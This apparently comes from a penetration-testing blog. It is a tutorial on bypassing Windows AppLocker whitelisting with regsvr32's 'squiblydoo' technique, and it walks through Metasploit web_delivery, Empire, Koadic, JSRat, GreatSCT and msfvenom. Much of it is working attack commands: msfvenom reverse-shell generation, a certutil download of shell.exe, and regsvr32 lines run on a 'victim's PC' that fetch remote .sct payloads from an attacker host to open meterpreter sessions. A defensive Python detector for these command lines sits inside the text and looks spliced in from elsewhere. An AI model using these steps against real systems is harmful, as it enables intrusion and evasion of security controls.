The purpose of this post is to demonstrate the most common and familiar techniques for bypassing AppLocker application whitelisting. As we know, for security reasons the system admin adds group policies to restrict application execution for local users. In our previous article, “Windows AppLocker Policy – A Beginner’s Guide”, we discussed how AppLocker rules define your application control policies and how to work with them. Today you will learn how to bypass AppLocker policies with regsvr32.exe.
Table of Contents
· Introduction to regsvr32
· Working of regsvr32
· Multiple methods to attack with regsvr32
Introduction
Regsvr32 stands for Microsoft Register Server. It is a Windows command-line utility. While regsvr32 sometimes causes problems, it is an important file because it is a Windows system file. The file is found in a subfolder of C:\Windows. This file is able to observe, track and influence other programs. It is mainly used to register and unregister programs in Windows. Its file extension is .exe, and its process widely assists OLE (Object Linking and Embedding), DLL (Dynamic Link Libraries) and OCX (ActiveX control modules). The process works in the background and can be seen via Task Manager. It is one of Microsoft's trusted files.
Working
When you register a DLL file with regsvr32, information about the programs associated with it is added to Windows. These references are then accessed to find where the program data is and how to interact with it. While registering a DLL file, information is added to a central directory so that it can be used by Windows. The full path of these files literally points to the executable code, so Windows can call upon specific functions and use them to run that code. These files are very convenient because when a piece of software is updated, they automatically call upon the updated version; in short, they help avoid software versioning problems. Usually this file is not used except for registering and unregistering DLL files.
RegSvr32.exe has the following command-line options:
Syntax: Regsvr32 [/s] [/u] [/n] [/i[:cmdline]] dllname
/u – Unregister server
/i – Call DllInstall passing it an optional [cmdline]; when used with /u, it calls DLL uninstall
/n – Do not call DllRegisterServer; this option must be used with /i
/s – Silent; display no message boxes
Multiple Methods
· Web Delivery
· Empire
· Manual
· MSFVenom
· Koadic
· JSRat
· GreatSCT
Web Delivery
This module quickly fires up a web server that serves a payload. The provided command allows a payload to be downloaded and executed, either through a specified scripting-language interpreter or through “squiblydoo” via regsvr32.exe to bypass application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command, e.g. in command injection.
Regsvr32 uses the “squiblydoo” technique for bypassing application whitelisting. The signed Microsoft binary Regsvr32 is able to request a .sct file and then execute the PowerShell command included inside it. Both web requests (i.e., the .sct file and the PowerShell download/execute) can occur on the same port. “PSH (Binary)” will write a file to disk, allowing custom binaries to be served up to be downloaded/executed.
use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 3
msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.109
msf exploit(web_delivery) > set srvhost 192.168.1.109
msf exploit(web_delivery) > exploit
Copy the highlighted text shown below:
Once the exploit is running, you will have a URL made for you. Run that URL in the command prompt of the victim’s PC as shown below:
regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll
Once you hit Enter after the command, you will have your session. Type ‘sysinfo’ for information about the PC, as shown in the image below:
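From the defender's side, the squiblydoo pattern described above is easy to pick out of process-creation telemetry: regsvr32 invoked with an /i: argument that points at a remote location and scrobj.dll as the "DLL". The following Python checker is an added example, not code from the original post; it parses regsvr32 command lines independent of switch order, case and quoting, and the sample events, host names, user names and function names are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed sample process-creation events (hypothetical hosts/users, not real telemetry).
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "raj",
     "cmdline": "regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll"},
    {"host": "ws01", "user": "raj",
     "cmdline": "REGSVR32.EXE /u /n /s /i:https://192.168.1.107:9998/uWBjv ScrObj.dll"},
    {"host": "ws02", "user": "SYSTEM",
     "cmdline": r'"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files\Vendor\vendor.ocx"'},
    {"host": "ws02", "user": "raj",
     "cmdline": r"regsvr32 /s /i:\\fileserver\share\payload.sct scrobj.dll"},
]

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def parse_regsvr32(cmdline):
    """Return (switches, install_arg, dll) for a regsvr32 command line, None if it is not regsvr32."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    if not tokens or basename(tokens[0]) not in ("regsvr32", "regsvr32.exe"):
        return None
    switches, install_arg, dll = set(), None, None
    for tok in tokens[1:]:
        if tok[:1] in "/-" and len(tok) > 1:      # a switch, possibly /i:<cmdline>
            name, _, value = tok[1:].partition(":")
            switches.add(name.lower())
            if name.lower() == "i" and value:
                install_arg = value
        else:                                      # the DLL/OCX being (un)registered
            dll = tok
    return switches, install_arg, dll

def is_remote(path):
    """True for http(s)/ftp URLs and UNC paths, i.e. content fetched from another machine."""
    return bool(path) and (path.startswith("\\\\")
                           or urlparse(path).scheme.lower() in ("http", "https", "ftp"))

def classify(cmdline):
    """'squiblydoo': remote /i: argument handed to scrobj.dll (the pattern used throughout this post);
    'suspicious': remote /i: argument with another DLL; 'benign': local registration; None: not regsvr32."""
    parsed = parse_regsvr32(cmdline)
    if parsed is None:
        return None
    switches, install_arg, dll = parsed
    if "i" in switches and is_remote(install_arg):
        return "squiblydoo" if basename(dll or "") == "scrobj.dll" else "suspicious"
    return "benign"
```

Running classify over SAMPLE_EVENTS flags the first, second and fourth entries and leaves the vendor OCX registration alone; an AppLocker DLL rule or a block on scrobj.dll being loaded by regsvr32 is the matching mitigation.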
PowerShell Empire
For our next method of regsvr32 attack we will use Empire. Empire is a post-exploitation framework. Till now we have been pairing our .sct attacks with Metasploit, but in this method we will use the Empire framework. It is a purely Python-based PowerShell Windows agent, which makes it quite useful. Empire is developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui and @xorrior. You can download this framework from https://github.com/EmpireProject/Empire.
For a basic guide to Empire, please visit our article introducing Empire: https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/
Once the Empire framework is started, type listeners to check whether there are any active listeners. As you can see in the image below, there are no active listeners. So, to set up a listener, type:
uselistener http
set Host http://192.168.1.109
execute
With the above commands, you will have an active listener. Type back to leave the listener menu so you can move on to your PowerShell stager.
Once you are out of the listener menu, you need to use a stager to create your malicious file. A stager, in Empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. This means that to create the payload we will have to use a stager. Therefore, type:
usestager windows/launcher_sct
set listener http
execute
After the execute command runs, usestager will create a launcher.sct in /tmp. Now, to get a session, start the Python server by typing:
python -m SimpleHTTPServer 8080
As the server is up, the only step left is to execute our malware on the victim’s PC. For this, type the following command in the command prompt:
regsvr32 /s /n /u /i:http://192.168.1.109:8080/tmp/launcher.sct scrobj.dll
In the above command we have used port 8080 because our Python server is running on that port.
Once the above is executed as described, you will receive a session. To access the session type:
interact 9ATUX4M7
Here, 9ATUX4M7 is an agent/session name; it will vary from session to session.
Inject PowerShell code in sct File (Manual Method)
Our next method is manual, with the help of an exploit. The exploit we will use will help us create the PowerShell code. So let’s first create our PowerShell code; for this, go to the Kali terminal and type:
use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.109
msf exploit(web_delivery) > set srvhost 192.168.1.109
msf exploit(web_delivery) > exploit
After running this exploit, it will show you the PowerShell code on the terminal screen, as shown in the following image. Copy the highlighted text shown below:
Now we need to create a .sct file in order for our attack to run. We found a script online to create a .sct file; you can access the script by clicking here. The script is shown in the image below:
Copy the PowerShell code created by web_delivery and paste it into the above script where it says “calc.exe”, as shown in the image below, and then save it with the .sct extension.
Then repeat the step above to run the .sct file with regsvr32.exe on the victim’s PC:
regsvr32 /u /n /s /i:http://192.168.1.109/1.sct scrobj.dll
As soon as the above command is executed, you will have your session through web_delivery. To access the session type ‘sessions 1’, and ‘info’ for basic information about the system.
MsfVenom
Our next method is to use msfvenom. Through this method we will create two .sct files, one to download our malware and another to execute it. But first let’s get going with msfvenom; for that, type:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe
Start up the Python server using the following command:
python -m SimpleHTTPServer 80
And simultaneously, in the same script used in the previous method, inject a certutil.exe command to fetch the shell.exe file from the remote server. Therefore, instead of “calc.exe”, write the certutil command and save the file again with the .sct extension:
We have used certutil here as it allows a file to be downloaded on Windows, and we have saved the file as 3.sct.
Now, run the above script using the following command:
regsvr32 /u /n /s /i:http://192.168.1.109/3.sct scrobj.dll
We will create another file to execute our previous file “shell.exe”. For that, again take the same script and where “calc.exe” is written, write instead:
cmd /k cd c:\Users\raj & shell.exe
We have saved this script as 4.sct, and again run it using the following command:
regsvr32 /u /n /s /i:http://192.168.1.109/4.sct scrobj.dll
Side by side, start up the multi handler too, to get a session. Hence, type:
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
After running the command on the victim’s PC, you will have a meterpreter session.
Koadic
Our next method uses Koadic. Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and PowerShell Empire. To know more about Koadic, please read our detailed article on the framework at this link: https://www.hackingarticles.in/koadic-com-command-control-framework
Once Koadic is up and running, type:
use stager/js/regsvr
set srvhost 192.168.1.107
run
After this, type the following in the command prompt of the victim’s PC:
regsvr32 /u /n /s /i:http://192.168.1.107:9998/uWBjv scrobj.dll
Once you run the above command, you will have a session. To access the session type:
zombie 0
JSRat
Our next method of attacking with regsvr32 uses JSRat, which you can download from GitHub. This is another very small command and control framework, just like Koadic and PowerShell Empire, for generating malicious tasks only for rundll32.exe and regsvr32.exe. JSRat will create a web server, and on that web server we will find our .sct file. To use this method type:
./JSRat.py -I 192.168.1.107 -p 4444
Running the above command will start the web server. Open it in your browser as shown below.
Here you will find the .sct file that you need to run on your victim’s PC.
As we have got the command, run it in the Run window as shown in the image below:
After executing the command in the Run window you will have a session as shown:
GreatSCT
GreatSCT is a tool that allows you to use Metasploit exploits and lets them bypass most anti-viruses. GreatSCT is currently supported by @ConsciousHacker. You can download it from https://github.com/GreatSCT/GreatSCT
Once it is downloaded and running, type the following command to access the modules:
use Bypass
Then type ‘list’ to get the list of modules. The list of modules will appear as shown in the image below:
From the list of modules choose the following:
use regsvr/shellcode_inject/base64_migrate.py
generate
After the above commands, type 1 to choose MSFVenom.
Then it will ask you for a payload. Just press Enter, as it will take windows/meterpreter/reverse_tcp as the default payload, and that is the one we need. After that provide the IP (here we have given 192.168.1.107) and then give a port (any); as you can see in the image below, we have given lport as 2345.
After giving the details, it will ask you for a name for your malware. By default it will set the name ‘payload’, so either give a name or just press Enter for the default setting.
As soon as you press Enter it will generate two files: one will be a resource file and the other a .sct file.
Now, first start the Python server in /usr/share/greatsct-output by typing:
python -m SimpleHTTPServer 80
Now execute the .sct file in the Run window of the victim’s PC as shown below.
Simultaneously, start the multi/handler using the resource file. For this, type:
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
And you have a meterpreter session.
Conclusion
Using regsvr32 to gain a session is quite an unusual way, but it is a very important one. The methods above use different tools and software to perform this attack.